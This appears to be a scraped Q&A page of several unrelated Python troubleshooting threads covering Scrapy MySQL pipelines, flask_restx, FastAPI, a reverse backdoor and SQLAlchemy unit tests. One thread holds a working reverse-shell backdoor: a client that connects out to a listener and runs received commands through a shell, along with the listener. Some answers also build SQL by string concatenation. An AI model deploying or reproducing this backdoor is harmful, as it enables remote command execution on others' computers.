Writing items to a MySQL database in Scrapy - mysql

I am new to Scrapy, I had the spider code
class Example_spider(BaseSpider):
name = "example"
allowed_domains = ["www.example.com"]
def start_requests(self):
yield self.make_requests_from_url("http://www.example.com/bookstore/new")
def parse(self, response):
hxs = HtmlXPathSelector(response)
urls = hxs.select('//div[#class="bookListingBookTitle"]/a/#href').extract()
for i in urls:
yield Request(urljoin("http://www.example.com/", i[1:]), callback=self.parse_url)
def parse_url(self, response):
hxs = HtmlXPathSelector(response)
main = hxs.select('//div[#id="bookshelf-bg"]')
items = []
for i in main:
item = Exampleitem()
item['book_name'] = i.select('div[#class="slickwrap full"]/div[#id="bookstore_detail"]/div[#class="book_listing clearfix"]/div[#class="bookstore_right"]/div[#class="title_and_byline"]/p[#class="book_title"]/text()')[0].extract()
item['price'] = i.select('div[#id="book-sidebar-modules"]/div[#class="add_to_cart_wrapper slickshadow"]/div[#class="panes"]/div[#class="pane clearfix"]/div[#class="inner"]/div[#class="add_to_cart 0"]/form/div[#class="line-item"]/div[#class="line-item-price"]/text()').extract()
items.append(item)
return items
And pipeline code is:
class examplePipeline(object):
def __init__(self):
self.dbpool = adbapi.ConnectionPool('MySQLdb',
db='blurb',
user='root',
passwd='redhat',
cursorclass=MySQLdb.cursors.DictCursor,
charset='utf8',
use_unicode=True
)
def process_item(self, spider, item):
# run db query in thread pool
assert isinstance(item, Exampleitem)
query = self.dbpool.runInteraction(self._conditional_insert, item)
query.addErrback(self.handle_error)
return item
def _conditional_insert(self, tx, item):
print "db connected-=========>"
# create record if doesn't exist.
tx.execute("select * from example_book_store where book_name = %s", (item['book_name']) )
result = tx.fetchone()
if result:
log.msg("Item already stored in db: %s" % item, level=log.DEBUG)
else:
tx.execute("""INSERT INTO example_book_store (book_name,price)
VALUES (%s,%s)""",
(item['book_name'],item['price'])
)
log.msg("Item stored in db: %s" % item, level=log.DEBUG)
def handle_error(self, e):
log.err(e)
After running this I am getting the following error
exceptions.NameError: global name 'Exampleitem' is not defined
I got the above error when I added the below code in process_item method
assert isinstance(item, Exampleitem)
and without adding this line I am getting
**exceptions.TypeError: 'Example_spider' object is not subscriptable
Can anyone make this code run and make sure that all the items saved into database?

Try the following code in your pipeline
import sys
import MySQLdb
import hashlib
from scrapy.exceptions import DropItem
from scrapy.http import Request
class MySQLStorePipeline(object):
def __init__(self):
self.conn = MySQLdb.connect('host', 'user', 'passwd',
'dbname', charset="utf8",
use_unicode=True)
self.cursor = self.conn.cursor()
def process_item(self, item, spider):
try:
self.cursor.execute("""INSERT INTO example_book_store (book_name, price)
VALUES (%s, %s)""",
(item['book_name'].encode('utf-8'),
item['price'].encode('utf-8')))
self.conn.commit()
except MySQLdb.Error, e:
print "Error %d: %s" % (e.args[0], e.args[1])
return item

Your process_item method should be declared as: def process_item(self, item, spider): instead of def process_item(self, spider, item): -> you switched the arguments around.
This exception: exceptions.NameError: global name 'Exampleitem' is not defined indicates you didn't import the Exampleitem in your pipeline.
Try adding: from myspiders.myitems import Exampleitem (with correct names/paths ofcourse).

I think this way is better and more concise:
#Item
class pictureItem(scrapy.Item):
topic_id=scrapy.Field()
url=scrapy.Field()
#SQL
self.save_picture="insert into picture(`url`,`id`) values(%(url)s,%(id)s);"
#usage
cur.execute(self.save_picture,dict(item))
It's just like
cur.execute("insert into picture(`url`,`id`) values(%(url)s,%(id)s)" % {"url":someurl,"id":1})
Cause (you can read more about Items in Scrapy)
The Field class is just an alias to the built-in dict class and doesn’t provide any extra functionality or attributes. In other words, Field objects are plain-old Python dicts.

Related

Bizarre Environment-dependent Bad Request 400 error

I'm writing a program to convert a repository into a Docker with an API based on some specification files. When I run the app on my Macbook's base environment, the computer-generated API works perfectly with both gunicorn and uwsgi. However, within the miniconda-based docker container, it failed with Bad Request 400: The browser (or proxy) sent a request that this server could not understand. My goal is to eliminate this error. Obviously, this has to do with the versions of some dependency or set of dependencies. Interestingly, the last endpoint in the API, which has a request parser within a namespace with no arguments, works perfectly, unlike the two other endpoints in the default namespace that do have arguments.
The API is built on flask_restx and uses reqparse.
The API code is here:
from flask_restx import Api, Resource, Namespace, reqparse, inputs
import flask
import process
from load_data import store_data
app = flask.Flask("restful_api")
api = Api(app, title="My API", description="This is an extremely useful API for performing tasks you would do with an API.", version="3.14")
data = {}
data.update(store_data())
class DefaultClass():
def __init__(self):
self.data = data
def _replace_get(self, **args):
default_args = {}
args = {**default_args, **args}
return process.replace(**args)
def _find_get(self, **args):
default_args = {"data": self.data["data"]}
args = {**default_args, **args}
return process.find_in_data_string(**args)
def set_up_worker():
global defaultClass
defaultClass = DefaultClass()
set_up_worker()
_replaceGetParser = reqparse.RequestParser()
_replaceGetParser.add_argument("txt",
type=str,
required=True,
help="Text to search ")
_replaceGetParser.add_argument("old",
type=str,
required=True,
help="Substring to replace ")
_replaceGetParser.add_argument("new",
type=str,
required=True,
help="Replacement for old ")
_replaceGetParser.add_argument("irrelevant_parameter",
type=int,
required=False,
default=5,
help="")
_replaceGetParser.add_argument("smart_casing",
type=inputs.boolean,
required=False,
default=True,
help="True if we should infer replacement capitalization from original casing. ")
_replaceGetParser.add_argument("case_sensitive",
type=inputs.boolean,
required=False,
default=True,
help="True if we should only replace case-sensitive matches ")
_findGetParser = reqparse.RequestParser()
_findGetParser.add_argument("window",
type=int,
required=False,
default=5,
help="Number of characters before and after first match to return ")
_findGetParser.add_argument("txt",
type=str,
required=False,
default="quick",
help="Your search term ")
#api.route('/replace', endpoint='replace', methods=['GET'])
#api.doc('defaultClass')
class ReplaceFrontend(Resource):
#api.expect(_replaceGetParser)
def get(self):
args = _replaceGetParser.parse_args()
return defaultClass._replace_get(**args)
#api.route('/find', endpoint='find', methods=['GET'])
#api.doc('defaultClass')
class FindFrontend(Resource):
#api.expect(_findGetParser)
def get(self):
args = _findGetParser.parse_args()
return defaultClass._find_get(**args)
retrievalNamespace = Namespace("retrieval", description="Data retrieval operations")
class RetrievalNamespaceClass():
def __init__(self):
self.data = data
def _retrieval_retrieve_data_get(self, **args):
default_args = {"data": self.data["data"]}
args = {**default_args, **args}
return process.return_data(**args)
def set_up_retrieval_worker():
global retrievalNamespaceClass
retrievalNamespaceClass = RetrievalNamespaceClass()
set_up_retrieval_worker()
_retrieval_retrieve_dataGetParser = reqparse.RequestParser()
#retrievalNamespace.route('/retrieval/retrieve_data', endpoint='retrieval/retrieve_data', methods=['GET'])
#retrievalNamespace.doc('retrievalNamespaceClass')
class Retrieval_retrieve_dataFrontend(Resource):
#retrievalNamespace.expect(_retrieval_retrieve_dataGetParser)
def get(self):
args = _retrieval_retrieve_dataGetParser.parse_args()
return retrievalNamespaceClass._retrieval_retrieve_data_get(**args)
api.add_namespace(retrievalNamespace)
I have had this problem with both pip-installed gunicorn and conda-installed uwsgi. I'm putting the file imported by the API at the end, since I think it is likely irrelevant what the function definitions are.
import numpy as np
import pandas as pd
import re
from subprocess import Popen, PIPE
from flask_restx import abort
def replace(txt: str = '', # apireq
old: str = '', # apireq
new: str = '', # apireq
case_sensitive: bool = True,
smart_casing: bool = True,
irrelevant_parameter: int = 5):
"""
Search and replace within a string, as long as the string and replacement
contain no four letter words.
arguments:
txt: Text to search
old: Substring to replace
new: Replacement for old
case_sensitive: True if we should only replace case-sensitive matches
smart_casing: True if we should infer replacement capitalization
from original casing.
return
return value
"""
four_letter_words = [re.match('[a-zA-Z]{4}$', word).string
for word in ('%s %s' % (txt, new)).split()
if re.match('[a-zA-Z]{4}$', word)]
if four_letter_words:
error_message = ('Server refuses to process four letter word(s) %s'
% ', '.join(four_letter_words[:5])
+ (', etc' if len(four_letter_words) > 5 else ''))
abort(403, custom=error_message)
return_value = {}
if not case_sensitive:
return_value['output'] = txt.replace(old, new)
else:
lowered = txt.replace(old, old.lower())
return_value['output'] = lowered.replace(old.lower(), new)
return return_value
def find_in_data_string(txt: str = "quick", # req
window: int = 5,
data=None): # noapi
"""
Check if there is a match for your search string in our extensive database,
and return the position of the first match with the surrounding text.
arguments:
txt: Your search term
data: The server's text data
window: Number of characters before and after first match to return
"""
return_value = {}
if txt in data:
idx = data.find(txt)
min_idx = max(idx-window, 0)
max_idx = min(idx+len(txt)+window, len(data)-1)
return_value['string_found'] = True
return_value['position'] = idx
return_value['surrounding_string'] = data[min_idx:max_idx]
return_value['surrounding_string_indices'] = [min_idx, max_idx]
else:
return_value = {['string_found']: False}
return return_value
def return_data(data=None): # noapi
"""
Return all the data in our text database.
"""
with Popen(['which', 'aws'], shell=True, stdout=PIPE) as p:
output = p.stdout.read()
try:
assert not output.strip()
except AssertionError:
abort(503, custom='The server is incorrectly configured.')
return_value = {'data': data}
return return_value

Why isn't fastAPI making the database and returning the result here?

Long code ahead, kindly help out.
I am trying to create a point system for tweets. I have streamed tweets with #Python to a MySQL database and I am trying to create a points system for the same.
from typing_extensions import Self
import requests
import os
import json
import mysql.connector
from mysql.connector import Error
bearer_token = "$Bearer"#Getting tweet ids of specified user from database
ids=[]
class tweet_id:
def __init__(self, name):
self.name = name
def get_tweet_ids(self, name):
try:
connection = mysql.connector.connect(host='localhost',
database='twitterdb',
user='root',
password='pasword#123')
cursor = connection.cursor()
sql_select_query = """SELECT tweetid FROM twitterdb.StreamData WHERE username = %s"""
# set variable in query
cursor.execute(sql_select_query, (name,))
# fetch result
record = cursor.fetchall()
for row in record:
ids.append(int(row[0]))
except mysql.connector.Error as error:
print("Failed to get record from MySQL table: {}".format(error))
"""finally:
if connection.is_connected():
cursor.close()
connection.close()"""
def create_url():
tweet_fields = "tweet.fields=public_metrics"
converted_list = [str(element) for element in ids]
id_list = ",".join(converted_list)
url = "https://api.twitter.com/2/tweets?ids={}&{}".format(id_list, tweet_fields)
return url
def bearer_oauth(r):
"""
Method required by bearer token authentication.
"""
r.headers["Authorization"] = f"Bearer {bearer_token}"
return r
def connect_to_endpoint(url):
response = requests.request("GET", url, auth=bearer_oauth)
print(response.status_code)
if response.status_code != 200:
raise Exception(
"Request returned an error: {} {} {}".format(
response.status_code, response.text, ids
)
)
return url
return response.json()
def main():
#def __init__(connect, append_to_database):
#Self.connect = connect
#Self.append_to_database = append_to_database
def connect(tweetid, retweet_count, reply_count, like_count, quote_count):
"""
connect to MySQL database and insert twitter data
"""
try:
con = mysql.connector.connect(host='localhost',
database='twitterdb', user='root', password='pasword#123', charset='utf8')
if con.is_connected():
"""
Insert twitter data
"""
cursor = con.cursor(buffered=True)
# twitter, golf
query = "INSERT INTO Metrics (tweetid,retweet_count,reply_count,like_count,quote_count) VALUES (%s, %s, %s, %s, %s)"
cursor.execute(query, (tweetid,retweet_count,reply_count,like_count,quote_count))
con.commit()
except Error as e:
print(e)
cursor.close()
con.close()
return
def append_to_database(json_response):
#Loop through each tweet
for tweet in json_response['data']:
# Tweet ID
tweetid = tweet['id']
# Tweet metrics
retweet_count = tweet['public_metrics']['retweet_count']
reply_count = tweet['public_metrics']['reply_count']
like_count = tweet['public_metrics']['like_count']
quote_count = tweet['public_metrics']['quote_count']
connect(tweetid, retweet_count, reply_count, like_count, quote_count)
url = create_url()
json_response = connect_to_endpoint(url)
append_to_database(json_response)
#function for connecting and inserting to database
#Function to calculate sum of points and display it
class summer:
like_points=0
reply_points=0
total_rts=0
rt_points=0
total=0
def sum_fun():
try:
con = mysql.connector.connect(host='localhost',
database='twitterdb', user='root', password='pasword#123', charset='utf8')
if con.is_connected():
cursor = con.cursor(buffered=True)
def sum_rts():
cursor.execute("SELECT SUM(retweet_count) FROM twitterdb.Metrics")
sum1=cursor.fetchall()[0][0]
if sum1 is None:
return 0;
else:
return int(sum1)
def sum_replies():
cursor.execute("SELECT SUM(reply_count) FROM twitterdb.Metrics")
sum2=cursor.fetchall()[0][0]
if sum2 is None:
return 0
else:
return int(sum2)
def sum_likes():
cursor.execute("SELECT SUM(like_count) FROM twitterdb.Metrics")
sum3=cursor.fetchall()[0][0]
if sum3 is None:
return 0
else:
return int(sum3)
def sum_qts():
cursor.execute("SELECT SUM(quote_count) FROM twitterdb.Metrics")
sum4=cursor.fetchall()[0][0]
if sum4 is None:
return 0
else:
return int(sum4)
like_points= (20*(sum_likes()))
reply_points= (100 * (sum_replies()))
total_rts= (sum_rts() + sum_qts())
rt_points = (300 * total_rts)
total = (like_points + reply_points + rt_points)
return total
#print("Like Points:", like_points)
#print("Reply Points:", reply_points)
#print("Retweet Points:", rt_points)
#print("Total Points:",total)
# print(points)
except Error as e:
print(e)
cursor.close()
con.close()
def clear():
"""
connect to MySQL database and insert twitter data
"""
try:
con = mysql.connector.connect(host='localhost',
database='twitterdb', user='root', password='Mysql#123', charset='utf8')
if con.is_connected():
cursor = con.cursor(buffered=True)
cursor.execute("truncate table twitterdb.Metrics")
except Error as e:
print(e)
#cursor.close()
#con.close()
return
Furthermore I have created an API on FastAPI to trigger all the functionalities in the above script and get the outputs,like_points, reply_points,rt_points and total sent via an API.The API accepts the value username via a POST request and triggers the script.
API code:
from fastapi import FastAPI
from pydantic import BaseModel
from metrics import tweet_id
from metrics import create_urls
from metrics import summer
import metrics
import uvicorn
from typing_extensions import Self
app = FastAPI()
class Username(BaseModel):
username:str
#app.post('/Username')
def Username(Username : Username):
username=Username.username
tweets_list = tweet_id(username)
tweets_list.get_tweet_ids(str(username))
metrics.clear()
metrics.main()
points=summer.sum_fun()
return{points.total}
if __name__ == "__main__":
uvicorn.run("api:app", host="127.0.0.1", port=5000, log_level="info")
I am unable to get the output and even though the request is completed I get null as the result. Why is that happening? Also, I am very new to a lot of this so code improvement suggestions and modifications are very welcome. Thank you.
you have commented your return in sum_fun() function
total = (like_points + reply_points + rt_points)
#return total
#print("Like Points:", like_points)
that's the reason None is returned when sum_fun() is invocated.

I get this error i get this Error "Object of type bytes is not JSON serializable" while testing my reverse_backdoor aganist my real computer

I have python 2 on my VM and my code is as follows:
#!/usr/bin/env python
import socket, json
class Listener:
def __init__(self, ip, port):
listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind((ip, port))
listener.listen(0)
print("[+] Waiting for incoming connection")
self.connection, address = listener.accept()
print("[+] Got a connection from " + str(address))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_remotely(self, command):
self.reliable_send(command)
return self.reliable_recieve()
def run(self):
while True:
command = raw_input(">> ")
result = self.execute_remotely(command)
print(result)
my_listener = Listener("ip adress", 4444)
my_listener.run()
And my target computer has python 3 and the code as follows:
#!/usr/bin/env python
import socket, subprocess
import json
class Backdoor:
def __init__(self, ip, port):
self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.connection.connect((ip, port))
def reliable_send(self, data):
json_data = json.dumps(data)
self.connection.send(json_data)
def reliable_recieve(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1024)
return json.loads(json_data)
except ValueError:
continue
def execute_system_command(self, command):
return subprocess.check_output(command, shell=True)
def run(self):
while True:
command = self.reliable_recieve()
command_result = self.execute_system_command(command)
self.reliable_send(command_result)
connection.close()
my_backdoor = Backdoor("ip address", 4444)
my_backdoor.run()
When I run this I get the error mentioned in the subject. I have tried to decode the json_data with the utf-8 argument but the problem persists.
i get this screen. The listener model is working in my VM but in my real pc its show this error
enter image description here
and if i decode my json_data its show the error "Object of type bytes is not JSON serializable"

Pipeline doesn't write to MySQL but also gives no error

I've tried to implement this pipeline in my spider.
After installing the necessary dependencies I am able to run the spider without any errors but for some reason it doesn't write to my database.
I'm pretty sure there is something going wrong with connecting to the database. When I give in a wrong password, I still don't get any error.
When the spider scraped all the data, it needs a few minutes before it starts dumping the stats.
2017-08-31 13:17:12 [scrapy] INFO: Closing spider (finished)
2017-08-31 13:17:12 [scrapy] INFO: Stored csv feed (27 items) in: test.csv
2017-08-31 13:24:46 [scrapy] INFO: Dumping Scrapy stats:
Pipeline:
import MySQLdb.cursors
from twisted.enterprise import adbapi
from scrapy.xlib.pydispatch import dispatcher
from scrapy import signals
from scrapy.utils.project import get_project_settings
from scrapy import log
SETTINGS = {}
SETTINGS['DB_HOST'] = 'mysql.domain.com'
SETTINGS['DB_USER'] = 'username'
SETTINGS['DB_PASSWD'] = 'password'
SETTINGS['DB_PORT'] = 3306
SETTINGS['DB_DB'] = 'database_name'
class MySQLPipeline(object):
#classmethod
def from_crawler(cls, crawler):
return cls(crawler.stats)
def __init__(self, stats):
print "init"
#Instantiate DB
self.dbpool = adbapi.ConnectionPool ('MySQLdb',
host=SETTINGS['DB_HOST'],
user=SETTINGS['DB_USER'],
passwd=SETTINGS['DB_PASSWD'],
port=SETTINGS['DB_PORT'],
db=SETTINGS['DB_DB'],
charset='utf8',
use_unicode = True,
cursorclass=MySQLdb.cursors.DictCursor
)
self.stats = stats
dispatcher.connect(self.spider_closed, signals.spider_closed)
def spider_closed(self, spider):
print "close"
""" Cleanup function, called after crawing has finished to close open
objects.
Close ConnectionPool. """
self.dbpool.close()
def process_item(self, item, spider):
print "process"
query = self.dbpool.runInteraction(self._insert_record, item)
query.addErrback(self._handle_error)
return item
def _insert_record(self, tx, item):
print "insert"
result = tx.execute(
" INSERT INTO matches(type,home,away,home_score,away_score) VALUES (soccer,"+item["home"]+","+item["away"]+","+item["score"].explode("-")[0]+","+item["score"].explode("-")[1]+")"
)
if result > 0:
self.stats.inc_value('database/items_added')
def _handle_error(self, e):
print "error"
log.err(e)
Spider:
import scrapy
import dateparser
from crawling.items import KNVBItem
class KNVBspider(scrapy.Spider):
name = "knvb"
start_urls = [
'http://www.knvb.nl/competities/eredivisie/uitslagen',
]
custom_settings = {
'ITEM_PIPELINES': {
'crawling.pipelines.MySQLPipeline': 301,
}
}
def parse(self, response):
# www.knvb.nl/competities/eredivisie/uitslagen
for row in response.xpath('//div[#class="table"]'):
for div in row.xpath('./div[#class="row"]'):
match = KNVBItem()
match['home'] = div.xpath('./div[#class="value home"]/div[#class="team"]/text()').extract_first()
match['away'] = div.xpath('./div[#class="value away"]/div[#class="team"]/text()').extract_first()
match['score'] = div.xpath('./div[#class="value center"]/text()').extract_first()
match['date'] = dateparser.parse(div.xpath('./preceding-sibling::div[#class="header"]/span/span/text()').extract_first(), languages=['nl']).strftime("%d-%m-%Y")
yield match
If there are better pipelines available to do what I'm trying to achieve that'd be welcome as well. Thanks!
Update:
With the link provided in the accepted answer I eventually got to this function that's working (and thus solved my problem):
def process_item(self, item, spider):
print "process"
query = self.dbpool.runInteraction(self._insert_record, item)
query.addErrback(self._handle_error)
query.addBoth(lambda _: item)
return query
Take a look at this for how to use adbapi with MySQL for saving scraped items. Note the difference in your process_item and their process_item method implementation. While you return the item immediately, they return Deferred object which is the result of runInteraction method and which returns the item upon its completion. I think this is the reason your _insert_record never gets called.
If you can see the insert in your output that's already a good sign.
I'd rewrite the insert function this way:
def _insert_record(self, tx, item):
print "insert"
raw_sql = "INSERT INTO matches(type,home,away,home_score,away_score) VALUES ('%s', '%s', '%s', '%s', '%s')"
sql = raw_sql % ('soccer', item['home'], item['away'], item['score'].explode('-')[0], item['score'].explode('-')[1])
print sql
result = tx.execute(sql)
if result > 0:
self.stats.inc_value('database/items_added')
It allows you to debug the sql you're using. In you version you're not wrapping the string in ' which is a syntax error in mysql.
I'm not sure about your last values (score) so I treated them as strings.

SQLAlchemy session voes in unittest

I've just started using SQLAlchemy a few days ago and right now I'm stuck with a problem that I hope anyone can shed some light on before I loose all my hair.
When I run a unittest, see snippet below, only the first test in the sequence is passing. The test testPhysicalPrint works just fine, but testRecordingItem fails with NoResultFound exception - No row was found for one(). But if I remove testPhysicalPrint from the test class, then testRecordingItem works.
I assume that the problem has something to do with the session, but I can't really get a grip of it.
In case anyone wonders, the setup is as follows:
Python 3.1 (Ubuntu 10.04 package)
SQLAlchemy 0.7.2 (easy_install:ed)
PostgreSQL 8.4.8 (Ubuntu 10.04 package)
PsycoPG2 2.4.2 (easy_installed:ed)
Exemple test:
class TestSchema(unittest.TestCase):
test_items = [
# Some parent class products
PrintItem(key='p1', title='Possession', dimension='30x24'),
PrintItem(key='p2', title='Andrzej Żuławski - a director', dimension='22x14'),
DigitalItem(key='d1', title='Every Man His Own University', url='http://www.gutenberg.org/files/36955/36955-h/36955-h.htm'),
DigitalItem(key='d2', title='City Ballads', url='http://www.gutenberg.org/files/36954/36954-h/36954-h.htm'),
]
def testPrintItem(self):
item = self.session.query(PrintItem).filter(PrintItem.key == 'p1').one()
assert item.title == 'Possession', 'Title mismatch'
def testDigitalItem(self):
item2 = self.session.query(DigitalItem).filter(DigitalItem.key == 'd2').one()
assert item2.title == 'City Ballads', 'Title mismatch'
def setUp(self):
Base.metadata.create_all()
self.session = DBSession()
self.session.add_all(self.test_items)
self.session.commit()
def tearDown(self):
self.session.close()
Base.metadata.drop_all()
if __name__ == '__main__':
unittest.main()
UPDATE
Here is the working code snippet.
# -*- coding: utf-8 -*-
import time
import unittest
from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import *
Base = declarative_base()
engine = create_engine('sqlite:///testdb', echo=False)
DBSession = sessionmaker(bind=engine)
class ItemMixin(object):
"""
Commons attributes for items, ie books, DVD:s...
"""
__tablename__ = 'testitems'
__table_args__ = {'extend_existing':True}
id = Column(Integer, autoincrement=True, primary_key=True)
key = Column(Unicode(16), unique=True, nullable=False)
title = Column(UnicodeText, default=None)
item_type = Column(Unicode(20), default=None)
__mapper_args__ = {'polymorphic_on': item_type}
def __init__(self, key, title=None):
self.key = key
self.title = title
class FooItem(Base, ItemMixin):
foo = Column(UnicodeText, default=None)
__mapper_args__ = {'polymorphic_identity':'foo'}
def __init__(self, foo=None, **kwargs):
ItemMixin.__init__(self, **kwargs)
self.foo = foo
class BarItem(Base, ItemMixin):
bar = Column(UnicodeText, default=None)
__mapper_args__ = {'polymorphic_identity':'bar'}
def __init__(self, bar=None, **kwargs):
ItemMixin.__init__(self, **kwargs)
self.bar = bar
# Tests
class TestSchema(unittest.TestCase):
# Class variables
is_setup = False
session = None
metadata = None
test_items = [
FooItem(key='f1', title='Possession', foo='Hello'),
FooItem(key='f2', title='Andrzej Żuławsk', foo='World'),
BarItem(key='b1', title='Wikipedia', bar='World'),
BarItem(key='b2', title='City Ballads', bar='Hello'),
]
def testFooItem(self):
print ('Test Foo Item')
item = self.__class__.session.query(FooItem).filter(FooItem.key == 'f1').first()
assert item.title == 'Possession', 'Title mismatch'
def testBarItem(self):
print ('Test Bar Item')
item = self.__class__.session.query(BarItem).filter(BarItem.key == 'b2').first()
assert item.title == 'City Ballads', 'Title mismatch'
def setUp(self):
if not self.__class__.is_setup:
self.__class__.session = DBSession()
self.metadata = Base.metadata
self.metadata.bind = engine
self.metadata.drop_all() # Drop table
self.metadata.create_all() # Create tables
self.__class__.session.add_all(self.test_items) # Add data
self.__class__.session.commit() # Commit
self.__class__.is_setup = True
def tearDown(self):
if self.__class__.is_setup:
self.__class__.session.close()
# Just for Python >=2.7 or >=3.2
#classmethod
def setUpClass(cls):
pass
#Just for Python >=2.7 or >=3.2
#classmethod
def tearDownClass(cls):
pass
if __name__ == '__main__':
unittest.main()
The most likely reason for this behavior is the fact that that data is not properly cleaned up between the tests. This explains why when you run only one test, it works.
setUp is called before every test, and tearDown - after.
Depending on what you would like to achieve, you have two options:
create data only once for all test.
In this case you if you had Python-2.7+ or Python-3.2+, you could use tearDownClass method. In your case you can handle it with a boolean class variable to prevent the code you have in setUp running more then once.
re-create data before every test
In this case you need to make sure that in the tearDown you delete all the data. This is what you are not doing right now, and I suspect that when the second test is ran, the call to one() fails not because it does not find an object, but because it finds more two objects matching the criteria.
Check the output of this code to understand the call sequence:
import unittest
class TestSchema(unittest.TestCase):
def testOne(self):
print '==testOne'
def testTwo(self):
print '==testTwo'
def setUp(self):
print '>>setUp'
def tearDown(self):
print '<<tearDown'
#classmethod
def setUpClass():
print '>>setUpClass'
#classmethod
def tearDownClass():
print '<<tearDownClass'
if __name__ == '__main__':
unittest.main()
Output:
>>setUp
==testOne
<<tearDown
>>setUp
==testTwo
<<tearDown
I have this as my tearDown method and it does work fine for my tests:
def tearDown (self):
"""Cleans up after each test case."""
sqlalchemy.orm.clear_mappers()